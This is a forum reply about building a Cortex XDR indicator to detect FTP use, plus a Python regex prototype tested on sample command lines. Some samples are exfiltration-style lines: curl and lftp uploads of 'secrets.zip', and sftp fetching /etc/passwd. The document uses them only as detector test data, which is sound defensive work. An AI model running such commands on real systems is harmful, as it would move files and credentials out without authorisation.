Cyber Elite

@J.Gammara,

You might have better luck posting this in the Cortex XDR specific discussion forum. There are a couple of folks who at least monitor that on a somewhat regular basis who would pick up your discussion and be able to help a bit more. You would need to really test your regex to ensure that this doesn't capture too much; it's a bit of a risky exercise, honestly.
You'll need to attempt to account for various FTP methods if I understand your end goal appropriately. As an example, you can utilize wget ftp://myftpsite.com, you can utilize FTP directly, curl, and about a million other utilities. Your most common "catch" would just be building an indicator for ftp://anything and attempting to build something for ftp itself that isn't going to be overly broad and capture more than you want.

I'd also just toss out that building a firewall rule to limit FTP and alert on any denied FTP sessions would likely actually be an easier path forward and still allow you to alert on unexpected/denied FTP traffic.

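As an added example, not from the original thread or from the poster, here is one way to prototype the two-part indicator described above (an ftp:// URL anywhere in the command line, plus a known FTP client as the executed program) and check it against sample command lines before putting it into a detection rule. The command lines are constructed for the example; the regexes are Python syntax and would need to be re-tested in whatever regex dialect the product's indicator editor actually uses.

```python
import re
from typing import Optional

# Part 1: an explicit ftp:// or ftps:// URL anywhere in the command line.
# The negative lookbehind rejects sftp:// (SSH file transfer) and tftp://,
# which are different protocols; add them as separate indicators if wanted.
FTP_URL_RE = re.compile(r"(?<![A-Za-z])ftps?://", re.IGNORECASE)

# Part 2: a known FTP client as the program being executed. Anchored to the
# first token so "grep ftp ..." or "cat /etc/vsftpd.conf" do not match, and
# the trailing lookahead keeps "ftpd" (the server) from matching "ftp".
# The client list is an assumption for the example; extend it to taste.
FTP_CLIENT_RE = re.compile(
    r"^\s*(?:\S*[\\/])?(?:ftp|lftp|ncftp|ncftpget|ncftpput|tnftp)(?:\.exe)?(?=\s|$)",
    re.IGNORECASE,
)


def classify(cmdline: str) -> Optional[str]:
    """Return 'ftp-url', 'ftp-client', or None for a process command line."""
    if FTP_URL_RE.search(cmdline):
        return "ftp-url"
    if FTP_CLIENT_RE.match(cmdline):
        return "ftp-client"
    return None


def scan(cmdlines):
    """Return only the command lines that would alert, paired with the reason."""
    hits = []
    for cmd in cmdlines:
        verdict = classify(cmd)
        if verdict is not None:
            hits.append((cmd, verdict))
    return hits


# Constructed sample command lines (not from the original thread).
SAMPLE_CMDLINES = [
    "wget ftp://myftpsite.com/pub/file.tar.gz",
    "curl -u user:pass -T secrets.zip FTP://myftpsite.com/upload/",
    "ftp -n myftpsite.com",
    "/usr/bin/ftp 10.0.0.5",
    r"C:\Windows\System32\ftp.exe -s:cmds.txt 10.0.0.5",
    "lftp -e 'put secrets.zip' ftp.example.com",
    "sftp user@host:/etc/passwd .",             # SSH file transfer, not FTP
    "tftp -g -r boot.bin 10.0.0.1",             # TFTP, deliberately not matched
    "grep ftp /var/log/syslog",                 # 'ftp' only as an argument
    "cat /etc/vsftpd.conf",                     # path containing 'ftp'
    "ftpd -D",                                  # the server, not a client
    "curl https://example.com/ftp-guide.html",  # no ftp:// scheme
    "python3 -c 'import ftplib'",               # blind spot: library use
]

if __name__ == "__main__":
    for cmd, verdict in scan(SAMPLE_CMDLINES):
        print(f"{verdict:11s} {cmd}")
```

The negative cases are the important part of the test set: every one of them contains the string "ftp" and would be caught by a naive indicator. The last line is the honest limitation of this approach, since a script that opens an FTP socket through a library, or a renamed client binary, never shows the pattern on the command line; that gap is part of why the firewall-side rule suggested above is the more reliable place to catch the traffic itself.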